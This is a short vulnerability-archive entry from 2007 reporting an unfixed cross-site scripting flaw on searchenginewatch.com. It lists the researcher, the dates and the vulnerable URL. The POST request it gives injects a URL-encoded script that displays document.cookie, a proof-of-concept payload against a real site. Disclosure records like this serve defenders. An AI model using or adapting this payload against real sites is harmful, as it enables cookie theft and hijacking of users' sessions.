Security researcher Johnjuan728, has submitted on 17/09/2007 a cross-site-scripting (XSS) vulnerability affecting searchenginewatch.com, which at the time of submission ranked 2253 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 17/09/2007 |
Date published: 20/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Johnjuan728 |
Domain: searchenginewatch.com |
Category: XSS |
Pagerank: 2253 |
URL: http://searchenginewatch.com/showPage.html?page=sew_search_results |
POST: page=sew_search_results&SEARCH_AMOUNT=10&SEARCH_PRODUCTS%5B%5D=Search+Engine+Watch+Subscriber&SEARCH _PRODUCTS%5B%5D=Search+Engine+Watch&SEARCH_DATED=Y&q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscr ipt%3E&submit2.x=16&submit2.y=12&submit2=Search |
Click here to view the mirror
|
|
|